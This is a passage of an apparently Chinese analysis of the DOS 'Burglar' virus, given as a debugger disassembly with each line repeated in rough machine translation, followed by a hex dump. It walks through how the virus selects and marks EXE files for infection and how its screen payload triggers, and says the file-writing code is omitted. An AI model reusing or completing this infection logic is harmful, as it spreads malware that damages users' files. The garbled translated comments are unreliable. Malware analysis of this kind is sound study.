9F6A:01F2 93 XCHG AX,BX 9F6A: 01F2 93 XCHG AX, BX
9F6A:01F3 B85700 MOV AX,0057 ;取文件时间 9F6A: 01F3 B85700 MOV AX, 0057; take the time to file
9F6A:01F6 E8B4FE CALL 00AD 9F6A: 01F6 E8B4FE CALL 00AD
9F6A:01F9 2E890E2905 MOV CS:[0529],CX 9F6A: 01F9 2E890E2905 MOV CS: [0529], CX
9F6A:01FE 52 PUSH DX 9F6A: 01FE 52 PUSH DX
9F6A:01FF 90 NOP 9F6A: 01FF 90 NOP
9F6A:0200 0E PUSH CS 9F6A: 0200 0E PUSH CS
9F6A:0201 1F POP DS 9F6A: 0201 1F POP DS
9F6A:0202 0E PUSH CS 9F6A: 0202 0E PUSH CS
9F6A:0203 07 POP ES 9F6A: 0203 07 POP ES
9F6A:0204 B03F MOV AL,3F ;读文件头66H 字节 9F6A: 0204 B03F MOV AL, 3F; read file header 66H bytes
9F6A:0206 BA7F04 MOV DX,047F ;到047F 9F6A: 0206 BA7F04 MOV DX, 047F; to 047F
9F6A:0209 B96600 MOV CX,0066 9F6A: 0209 B96600 MOV CX, 0066
9F6A:020C E89EFE CALL 00AD 9F6A: 020C E89EFE CALL 00AD
9F6A:020F A17F04 MOV AX,[047F] 9F6A: 020F A17F04 MOV AX, [047F]
9F6A:0212 90 NOP 9F6A: 0212 90 NOP
9F6A:0213 3D5A4D CMP AX,4D5A ;.EXE 文件转0222 9F6A: 0213 3D5A4D CMP AX, 4D5A;. EXE file transfer 0222
9F6A:0216 90 NOP 9F6A: 0216 90 NOP
9F6A:0217 7409 JZ 0222 9F6A: 0217 7409 JZ 0222
9F6A:0219 3D4D5A CMP AX,5A4D 9F6A: 0219 3D4D5A CMP AX, 5A4D
9F6A:021C 90 NOP 9F6A: 021C 90 NOP
9F6A:021D 7403 JZ 0222 9F6A: 021D 7403 JZ 0222
9F6A:021F EB14 JMP 0235 ;非.EXE 文件不传染 9F6A: 021F EB14 JMP 0235; not. EXE files do not infect
9F6A:0221 90 NOP 9F6A: 0221 90 NOP
;=================================================================== ;================================================= ==================
;传染.EXE 文件 ; Infection. EXE files
9F6A:0222 A09304 MOV AL,[0493] ;.EXE 文件传染标志 9F6A: 0222 A09304 MOV AL, [0493];. EXE files infection signs
9F6A:0225 3478 XOR AL,78 ;文件头中IP xor CRC = 78 9F6A: 0225 3478 XOR AL, 78; file header IP xor CRC = 78
9F6A:0227 38069104 CMP [0491],AL 9F6A: 0227 38069104 CMP [0491], AL
9F6A:022B 7408 JZ 0235 ;未传染转025D 9F6A: 022B 7408 JZ 0235; switch 025D is not contagious
9F6A:022D EB2E JMP 025D 9F6A: 022D EB2E JMP 025D
9F6A:022F 90 NOP ;传染成功设置传染标志 9F6A: 022F 90 NOP; infection successfully transmitted symbol set
9F6A:0230 830E29051D OR Word Ptr [0529],+1D ;时间设置为1D 9F6A: 0230 830E29051D OR Word Ptr [0529], +1 D; time is set to 1D
9F6A:0235 5A POP DX 9F6A: 0235 5A POP DX
9F6A:0236 8B0E2905 MOV CX,[0529] 9F6A: 0236 8B0E2905 MOV CX, [0529]
9F6A:023A B85701 MOV AX,0157 ;恢复文件时间 9F6A: 023A B85701 MOV AX, 0157; restore file time
9F6A:023D E86DFE CALL 00AD 9F6A: 023D E86DFE CALL 00AD
9F6A:0240 B03E MOV AL,3E ;关闭文件 9F6A: 0240 B03E MOV AL, 3E; close the file
9F6A:0242 E868FE CALL 00AD 9F6A: 0242 E868FE CALL 00AD
9F6A:0245 B84301 MOV AX,0143 ;恢复文件属性 9F6A: 0245 B84301 MOV AX, 0143; restore file attributes
9F6A:0248 59 POP CX 9F6A: 0248 59 POP CX
9F6A:0249 5A POP DX 9F6A: 0249 5A POP DX
9F6A:024A 1F POP DS 9F6A: 024A 1F POP DS
9F6A:024B E85FFE CALL 00AD 9F6A: 024B E85FFE CALL 00AD
9F6A:024E 33C0 XOR AX,AX ;恢复原INT 24 9F6A: 024E 33C0 XOR AX, AX; to restore the original INT 24
9F6A:0250 8ED8 MOV DS,AX 9F6A: 0250 8ED8 MOV DS, AX
9F6A:0252 8F069200 POP [0092] 9F6A: 0252 8F069200 POP [0092]
9F6A:0256 8F069000 POP [0090] 9F6A: 0256 8F069000 POP [0090]
9F6A:025A 0E PUSH CS 9F6A: 025A 0E PUSH CS
9F6A:025B 1F POP DS 9F6A: 025B 1F POP DS
9F6A:025C C3 RET 9F6A: 025C C3 RET
;====================================================================== ;================================================= =====================
;开始传染.EXE 文件 ; Begin transmission. EXE files
9F6A:025D BE7F04 MOV SI,047F ;SI 指向文件头 9F6A: 025D BE7F04 MOV SI, 047F; SI points to the file header
9F6A:0260 90 NOP 9F6A: 0260 90 NOP
9F6A:0261 C70627050000 MOV Word Ptr [0527],0000 9F6A: 0261 C70627050000 MOV Word Ptr [0527], 0000
9F6A:0267 8B543C MOV DX,[SI+3C] ;取NE 文件头偏移 9F6A: 0267 8B543C MOV DX, [SI +3 C]; take the NE header offset
9F6A:026A 8B4C3E MOV CX,[SI+3E] 9F6A: 026A 8B4C3E MOV CX, [SI +3 E]
9F6A:026D B80042 MOV AX,4200 9F6A: 026D B80042 MOV AX, 4200
9F6A:0270 CD21 INT 21 9F6A: 0270 CD21 INT 21
9F6A:0272 B90200 MOV CX,0002 ;读出NE 文件头2 字节 9F6A: 0272 B90200 MOV CX, 0002; read 2-byte header NE
9F6A:0275 BA2705 MOV DX,0527 9F6A: 0275 BA2705 MOV DX, 0527
9F6A:0278 B43F MOV AH,3F 9F6A: 0278 B43F MOV AH, 3F
9F6A:027A CD21 INT 21 9F6A: 027A CD21 INT 21
9F6A:027C 813E27054E45 CMP Word Ptr [0527],454E 9F6A: 027C 813E27054E45 CMP Word Ptr [0527], 454E
9F6A:0282 7502 JNZ 0286 ;是"NE" 新格式文件 9F6A: 0282 7502 JNZ 0286; is "NE" new format
9F6A:0284 EBAF JMP 0235 ;不传染 9F6A: 0284 EBAF JMP 0235; not contagious
9F6A:0286 B002 MOV AL,02 ;4202 功能 9F6A: 0286 B002 MOV AL, 02; 4202 function
9F6A:0288 E8C900 CALL 0354 ;取文件长度 9F6A: 0288 E8C900 CALL 0354; take the file length
9F6A:028B 83FA06 CMP DX,+06 ;> 393216 字节不传染 9F6A: 028B 83FA06 CMP DX, +06;> 393216 bytes of non-infectious
9F6A:028E 77A5 JA 0235 9F6A: 028E 77A5 JA 0235
9F6A:0290 0BD2 OR DX,DX 9F6A: 0290 0BD2 OR DX, DX
9F6A:0292 7507 JNZ 029B 9F6A: 0292 7507 JNZ 029B
9F6A:0294 3D0001 CMP AX,0100 ;< 256 字节不传染 9F6A: 0294 3D0001 CMP AX, 0100; <256 bytes of non-infectious 9F6A:0297 7702 JA 029B 9F6A: 0297 7702 JA 029B 9F6A:0299 EB9A JMP 0235 9F6A: 0299 ​​EB9A JMP 0235 9F6A:029B 52 PUSH DX 9F6A: 029B 52 PUSH DX 9F6A:029C 50 PUSH AX 9F6A: 029C 50 PUSH AX 9F6A:029D 8B4404 MOV AX,[SI+04] 9F6A: 029D 8B4404 MOV AX, [SI +04] 9F6A:02A0 8B7C02 MOV DI,[SI+02] 9F6A: 02A0 8B7C02 MOV DI, [SI +02] 9F6A:02A3 0BFF OR DI,DI 9F6A: 02A3 0BFF OR DI, DI 9F6A:02A5 7401 JZ 02A8 9F6A: 02A5 7401 JZ 02A8 9F6A:02A7 48 DEC AX 9F6A: 02A7 48 DEC AX 9F6A:02A8 B90002 MOV CX,0200 9F6A: 02A8 B90002 MOV CX, 0200 9F6A:02AB F7E1 MUL CX 9F6A: 02AB F7E1 MUL CX 9F6A:02AD 03C7 ADD AX,DI 9F6A: 02AD 03C7 ADD AX, DI 9F6A:02AF 83D200 ADC DX,+00 9F6A: 02AF 83D200 ADC DX, +00 9F6A:02B2 5F POP DI 9F6A: 02B2 5F POP DI 9F6A:02B3 3BF8 CMP DI,AX ;如果文件有覆盖部分 9F6A: 02B3 3BF8 CMP DI, AX; If the file has covered part of the 9F6A:02B5 5F POP DI ;不传染 9F6A: 02B5 5F POP DI; not contagious 9F6A:02B6 75E1 JNZ 0299 9F6A: 02B6 75E1 JNZ 0299 9F6A:02B8 3BFA CMP DI,DX 9F6A: 02B8 3BFA CMP DI, DX 9F6A:02BA 75DD JNZ 0299 9F6A: 02BA 75DD JNZ 0299 ... ... ;以下病毒具体传染文件的代码不是本文讨论的对象，故略去...;在传染完成后，病毒转发作部分，此病毒的发作是非恶性的 ; Specific virus infected file the following code is not the object of this paper, it is omitted ...; after the infection, the virus transmitted as part of this virus attack non-malignant 9F6A:0329 B42C MOV AH,2C ;取系统时间 9F6A: 0329 B42C MOV AH, 2C; get the system time 9F6A:032B CD21 INT 21 9F6A: 032B CD21 INT 21 9F6A:032D 80F90E CMP CL,0E ;分钟数为14 则发作 9F6A: 032D 80F90E CMP CL, 0E; minutes for the 14 episodes 9F6A:0330 751F JNZ 0351 9F6A: 0330 751F JNZ 0351 9F6A:0332 BE1E04 MOV SI,041E ;在屏幕左上角 9F6A: 0332 BE1E04 MOV SI, 041E; the upper left corner of the screen 9F6A:0335 B800B8 MOV AX,B800 ;打印Burglar 字样 9F6A: 0335 B800B8 MOV AX, B800; print Burglar words 9F6A:0338 8ED8 MOV DS,AX 9F6A: 0338 8ED8 MOV DS, AX 9F6A:033A 33FF XOR DI,DI 9F6A: 033A 33FF XOR DI, DI 9F6A:033C B90900 MOV CX,0009 9F6A: 033C B90900 MOV CX, 0009 9F6A:033F 2E8A04 MOV AL,CS:[SI] 9F6A: 033F 2E8A04 MOV AL, CS: [SI] 9F6A:0342 46 INC SI 9F6A: 0342 46 INC SI 9F6A:0343 8805 MOV [DI],AL 9F6A: 0343 8805 MOV [DI], AL 9F6A:0345 47 INC DI ;属性为加亮闪烁 9F6A: 0345 47 INC DI; property plus flashing light 9F6A:0346 C6058F MOV Byte Ptr [DI],8F 9F6A: 0346 C6058F MOV Byte Ptr [DI], 8F 9F6A:0349 47 INC DI 9F6A: 0349 47 INC DI 9F6A:034A E2F3 LOOP 033F 9F6A: 034A E2F3 LOOP 033F 9F6A:034C B97777 MOV CX,7777 ;延时 9F6A: 034C B97777 MOV CX, 7777; delay 9F6A:034F E2FE LOOP 034F 9F6A: 034F E2FE LOOP 034F 9F6A:0351 E9DCFE JMP 0230 9F6A: 0351 E9DCFE JMP 0230 ;=================================================================== ;================================================= ================== ;移动文件指针子程序 ; Move the file pointer routines 9F6A:0354 33C9 XOR CX,CX 9F6A: 0354 33C9 XOR CX, CX 9F6A:0356 33D2 XOR DX,DX 9F6A: 0356 33D2 XOR DX, DX 9F6A:0358 B442 MOV AH,42 9F6A: 0358 B442 MOV AH, 42 9F6A:035A CD21 INT 21 9F6A: 035A CD21 INT 21 9F6A:035C C3 RET 9F6A: 035C C3 RET 9F6A:0402 90 BC 06 81 01 9C-88 01 01 01 01 E7 43 4C .<.........gCL 9F6A: 0402 90 BC 06 81 01 9C-88 01 01 01 01 E7 43 4C .<......... gCL 9F6A:0410 48 57 54 42 46 2D 57 43-54 4B 00 00 00 00 42 75 HWTBF-WCTK....Bu 9F6A: 0410 48 57 54 42 46 2D 57 43-54 4B 00 00 00 00 42 75 HWTBF-WCTK .... Bu 9F6A:0420 72 67 6C 61 72 2F 48 2A-2E 2A 00 32 C0 CF 00 00 rglar/H*.*.2@O.. 9F6A: 0420 72 67 6C 61 72 2F 48 2A-2E 2A 00 32 C0 CF 00 00 rglar / H *.*. 2 @ O.. 9F6A:0430 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A: 0430 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A:0440 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A: 0440 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A:0450 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A: 0450 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A:0460 00 00 00 00 78 F0 00 00-19 04 0C 00 00 00 BC 15 ....xp........<. 9F6A: 0460 00 00 00 00 78 F0 00 00-19 04 0C 00 00 00 BC 15 .... xp ........<. 9F6A:0470 BC 15 06 70 A3 10 78 03-8A 17 65 0F 05 00 00 9F6A: 0470 BC 15 06 70 A3 10 78 03-8A 17 65 0F 05 00 00 9F6A:047F 4D <..p#.x...e....M 9F6A: 047F 4D <.. p #. X. .. e. ... M 9F6A:0480 5A C4 01 28 00 00 00 02-00 3D 0B FF FF B2 04 84 ZD.(.....=...2.. 9F6A: 0480 5A C4 01 28 00 00 00 02-00 3D 0B FF FF B2 04 84 ZD .(.....=... 2 .. 9F6A:0490 04 7E 89 06 00 B2 04 1C-00 00 00 64 69 65 74 F9 .~...2.....diety 9F6A: 0490 04 7E 89 06 00 B2 04 1C-00 00 00 64 69 65 74 F9 .~... 2 ..... diety 9F6A:04A0 9C EB 09 69 42 0A 00 A8-B8 55 F8 9C 06 1E 57 56 .k.iB..(8Ux...WV 9F6A: 04A0 9C EB 09 69 42 0A 00 A8-B8 55 F8 9C 06 1E 57 56. K.iB.. (8Ux. .. WV 9F6A:04B0 52 51 53 50 0E FC 8C C8-BA 52 07 03 D0 52 BA 79 RQSP.|.H:R..PR:y 9F6A: 04B0 52 51 53 50 0E FC 8C C8-BA 52 07 03 D0 52 BA 79 RQSP. |. H: R.. PR: y 9F6A:04C0 06 52 BA BC 04 03 C2 8B-D8 05 0E 03 8E DB 8E C0 .R:<..BX...[.@ 9F6A: 04C0 06 52 BA BC 04 03 C2 8B-D8 05 0E 03 8E DB 8E C0. R: <.. BX ...[. 9F6A:04D0 33 F6 33 FF B9 08 00 F3-A5 4B 48 4A 79 EE 8E C3 3v3.9..s%KHJyn.C 9F6A: 04D0 33 F6 33 FF B9 08 00 F3-A5 4B 48 4A 79 EE 8E C3 3v3.9 .. s% KHJyn.C 9F6A:04E0 8E D8 BE 67 00 .X>g. 9F6A: 04E0 8E D8 BE 67 00. X> g.
9F6A:04E5 01 3F 3F-3F 3F 3F 3F 3F 3F 3F 3F .?????????? 9F6A: 04E5 01 3F 3F-3F 3F 3F 3F 3F 3F 3F 3F .??????????
9F6A:04F0 3F 27 0D 00 00 00 12 E0-1E 00 20 FA 99 27 21 67 ?'.....`.. z.'!g 9F6A: 04F0 3F 27 0D 00 00 00 12 E0-1E 00 20 FA 99 27 21 67 ?'.....`.. z. '! G
9F6A:0500 59 00 00 56 49 52 2E 4C-53 54 00 45 00 00 00 00 Y..VIR.LST.E.... 9F6A: 0500 59 00 00 56 49 52 2E 4C-53 54 00 45 00 00 00 00 Y.. VIR.LST.E. ...
9F6A:0510 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A: 0510 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0520 00 00 00 00 00 38 05 00-00 7D 97 00 00 00 00 80 .....8...}...... 9F6A: 0520 00 00 00 00 00 38 05 00-00 7D 97 00 00 00 00 80 ..... 8 ...}......
9F6A:0530 00 6F 18 00 03 00 00 00-00 00 00 00 00 00 00 00 .o.............. 9F6A: 0530 00 6F 18 00 03 00 00 00-00 00 00 00 00 00 00 00. O. .............
9F6A:0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 9F6A: 0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................